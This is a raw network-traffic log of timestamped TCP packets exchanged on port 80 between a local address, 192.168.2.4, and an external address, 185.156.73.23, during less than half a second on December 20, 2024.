Dec 20, 2024 16:13:36.140127897 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.140332937 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.140372038 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.141731024 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.141781092 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.142096043 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.142142057 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.143826962 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.143867016 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.144349098 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.144417048 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.145768881 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.145812988 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.146538019 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.146588087 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.146612883 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.146656990 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.147041082 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.147089958 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.148260117 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.148314953 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.148555994 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.148607016 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.150367022 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.150424004 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.150824070 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.150872946 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.151582956 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.151628971 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.151818037 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.151871920 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.153328896 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.153390884 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.153650045 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.153700113 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.155252934 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.155308962 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.156255960 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.156311035 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.157450914 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.157510042 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.157968998 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.158019066 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.158633947 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.158684015 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.158698082 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.158737898 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.159929037 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.159981966 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.160104036 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.160142899 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.161452055 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.161499977 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.161581993 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.161626101 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.163136005 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.163197994 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.163361073 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.163407087 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.164782047 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.164824963 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.165055990 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.165102005 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.166361094 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.166410923 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.166925907 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.166975021 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.168220997 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.168267012 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.168320894 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.168361902 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.169763088 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.169827938 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.169888020 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.169926882 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.177900076 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.177961111 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.177979946 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.178009987 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.178656101 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.178705931 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.178863049 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.178909063 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.180223942 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.180274010 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.203244925 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.203310013 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.203386068 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.203425884 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.252017021 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.252079010 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.252326965 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.252372026 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.252928019 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.252942085 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.252979040 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.252993107 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.254554987 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.254600048 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.255166054 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.255211115 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.256102085 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.256150961 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.256228924 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.256270885 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.257646084 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.257688046 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.257885933 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.257924080 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.259342909 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.259397030 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.259587049 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.259628057 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.260843039 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.260879993 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.261159897 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.261198997 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.262337923 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.262378931 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.262540102 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.262578964 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.263859034 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.263899088 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.264250994 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.264295101 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.265420914 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.265460014 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.265763044 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.265815973 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.266930103 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.266972065 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.267704964 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.267746925 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.268661976 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.268712044 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.268851042 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.268897057 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.270394087 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.270446062 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.270747900 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.270800114 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.271934032 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.271986961 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.272300005 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.272345066 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.273384094 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.273430109 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.273576975 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.273617029 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.274857044 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.274905920 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.274991989 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.275031090 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.276313066 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.276351929 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.276823997 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.276865959 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.277633905 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.277677059 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.277967930 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.278012991 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.280718088 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.280761957 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.281086922 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.281136036 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.281841040 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.281886101 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.282041073 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.282083988 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.282957077 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.283001900 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.283129930 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.283174038 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.284157991 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.284200907 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.284368038 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.284409046 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.285387039 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.285435915 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.285753965 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.285803080 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.286834002 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.286881924 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.287266970 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.287308931 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.288621902 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.288669109 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.288727999 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.288764954 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.289886951 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.289930105 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.322571039 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.322634935 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.322846889 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.322899103 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.323302984 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.323467016 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.323749065 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.324558020 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.324644089 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.324773073 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.324920893 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.324960947 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.326133966 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.326178074 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.326350927 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.326395035 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.327514887 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.327553034 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.328025103 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.328068972 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.335338116 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.335387945 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.335458994 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.335499048 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.335999012 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.336050034 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.371649981 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.371702909 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.371731043 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.371767998 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.372101068 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.372136116 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.372178078 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.372212887 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.372992992 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.373035908 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.373219967 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.373258114 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.374174118 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.374227047 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.374228954 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.374288082 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.374753952 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.374806881 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.374869108 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.374914885 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.375900984 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.375950098 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.375986099 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.376032114 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.376899958 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.376950979 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.376996994 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.377039909 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.377965927 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.377978086 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.378015041 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.378032923 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.379060984 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.379110098 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.379362106 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.379410028 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.380604982 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.380650997 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.380702019 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.380788088 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.381989956 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.382014036 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.382041931 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.382060051 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.387132883 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.387214899 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.387305021 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.387326956 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.387346983 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.387357950 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.387854099 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.387868881 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.387901068 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.387912989 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.388459921 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.388500929 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.388714075 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.388729095 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.388756990 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.388767958 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.389357090 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.389374971 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.389405966 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.389426947 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.390801907 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.390853882 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.391072989 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.391150951 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.392379045 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.392421961 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.392441034 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.392458916 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.393594027 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.393641949 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.393815994 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.393860102 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.394931078 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.394977093 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.395670891 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.395742893 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.396477938 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.396539927 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.396789074 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.396848917 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.397681952 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.397732973 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.397888899 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.397932053 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.399203062 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.399251938 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.399753094 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.399790049 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.400507927 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.400559902 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.400614977 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.400657892 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.401859045 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.401904106 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.401937008 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.401978970 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.441696882 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.441777945 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.441886902 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.441932917 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.442337036 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.442352057 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.442382097 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.442397118 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.443701029 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.443747997 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.443911076 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.443955898 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.445089102 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.445135117 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.445667028 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.445715904 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.446469069 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.446513891 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.446597099 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.446639061 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.447911024 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:36.447959900 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:36.448261023 CET	80	49736	185.156.73.23	192.168.2.4
